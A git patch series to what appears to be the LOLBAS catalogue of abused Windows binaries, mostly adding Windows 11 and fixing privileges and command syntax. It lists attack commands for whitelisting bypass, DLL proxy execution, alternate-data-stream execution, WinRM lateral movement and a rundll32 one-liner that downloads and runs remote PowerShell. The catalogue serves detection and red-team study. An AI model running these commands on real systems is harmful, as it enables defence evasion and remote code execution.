Wscript.exe executing code from alternate data streams - IOC: DotNet CLR libraries loaded into wscript.exe - IOC: DotNet CLR Usage Log - wscript.exe.log diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index fcab2d3..b8e8f0f 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -10,7 +10,7 @@ Commands: Category: UAC bypass Privileges: User MitreID: T1548.002 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wsreset.exe Code_Sample: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 8c01a73..082ce3b 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -10,21 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 5e75f3c..8ee42f4 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -10,35 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 7deb471..dd9b427 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -1,29 +1,29 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: -- Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: +- Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5d4b41d..ca4dd14 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -10,33 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows, Windows 11 (!!!) Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4ddf18e..bfd4dee 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -10,19 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 945d373..85da874 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -4,13 +4,13 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + - Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index edf125c..f537aa8 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Code_Sample: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 4850278..587242c 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 67a1719..023d4e7 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -10,21 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location Usecase: Execute aribtrary, unsigned code via XSL script Category: AWL Bypass Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 7d525f8..842c3b3 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat From 6793a7d238b646dad0c21932360cd96a349aec3c Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 14 Dec 2021 16:50:22 +0000 Subject: [PATCH 03/11] Fixing various issues identified --- yml/OSBinaries/Cscript.yml | 2 +- yml/OSBinaries/Hh.yml | 3 +-- yml/OSBinaries/Infdefaultinstall.yml | 2 +- yml/OSBinaries/Netsh.yml | 2 +- yml/OSBinaries/Odbcconf.yml | 2 +- yml/OSBinaries/Regedit.yml | 3 +-- yml/OSBinaries/Regsvcs.yml | 8 ++++---- yml/OSBinaries/Rundll32.yml | 2 +- yml/OSBinaries/Vbc.yml | 10 +++++----- yml/OSBinaries/Wscript.yml | 2 +- yml/OSBinaries/Xwizard.yml | 2 +- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 12 ++++++------ yml/OSLibraries/Shell32.yml | 2 +- yml/OSScripts/CL_LoadAssembly.yml | 2 +- yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 4 ++-- 17 files changed, 30 insertions(+), 32 deletions(-) diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index c3fe1b4..2b84d9e 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: cscript c:\ads\file.txt:script.vbs + - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 714425a..8cf43fd 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\hh.exe - - Path: C:\Windows\SysWOW64\hh.exe + - Path: C:\Windows\hh.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e28ba10..1ec76d5 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -8,7 +8,7 @@ Commands: Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 969d433..87e70b9 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -8,7 +8,7 @@ Commands: Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute - Privileges: User + Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 07cd750..551c133 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -5,7 +5,7 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: odbcconf -f file.rsp - Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. + Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3868fd5..b45a3c1 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regedit.exe - - Path: C:\Windows\SysWOW64\regedit.exe + - Path: C:\Windows\regedit.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index bc2aa44..0b0e529 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -8,19 +8,19 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regsvcs.exe - - Path: C:\Windows\SysWOW64\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 568f322..59365e9 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet Category: Execute diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..a8bee1a 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -5,19 +5,19 @@ Author: Lior Adar Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe c:\temp\vbs\run.vb - Description: Binary file used by .NET to compile vb code to .exe + Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Description: Description of the second command - Usecase: A description of the usecase + Description: Binary file used by .NET to compile Visual Basic code to an executable. + Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index b1b8b54..d49557f 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: wscript c:\ads\file.txt:script.vbs + - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 082ce3b..96e5dcc 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. + Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. Usecase: Download file from Internet Category: Download Privileges: User diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 8ee42f4..b015321 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -15,7 +15,7 @@ Commands: Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index ca4dd14..631c1f1 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -10,35 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index bfd4dee..e94f6b2 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -4,7 +4,7 @@ Description: Windows Shell Common Dll Author: Created: 2018-05-25 Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 85da874..1fdea2a 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 587242c..d5e07b3 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 023d4e7..c108ab3 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' From e51caad3dd524efe75566e704f8aecb37c565461 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 14 Dec 2021 16:57:56 +0000 Subject: [PATCH 04/11] Adding Windows 11 reference to missed-out executables --- yml/OSBinaries/Pktmon.yml | 4 ++-- yml/OSBinaries/Pnputil.yml | 4 ++-- yml/OSBinaries/Ttdinject.yml | 4 ++-- yml/OSBinaries/Tttracer.yml | 4 ++-- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 77fd42b..50030de 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -10,14 +10,14 @@ Commands: Category: Reconnaissance Privileges: Administrator MitreID: T1040 - OperatingSystem: Windows 10 1809 and later + OperatingSystem: Windows 10 1809 and later, Windows 11 - Command: pktmon.exe filter add -p 445 Description: Select Desired ports for packet capture Usecase: Look for interesting traffic such as telent or FTP Category: Reconnaissance Privileges: Administrator MitreID: T1040 - OperatingSystem: Windows 10 1809 and later + OperatingSystem: Windows 10 1809 and later, Windows 11 Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 512ae99..0ff4fb1 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -10,10 +10,10 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1547 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\system32\pnputil.exe -Code_Sample: +Code_Sample: - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf Detection: - Sigma: 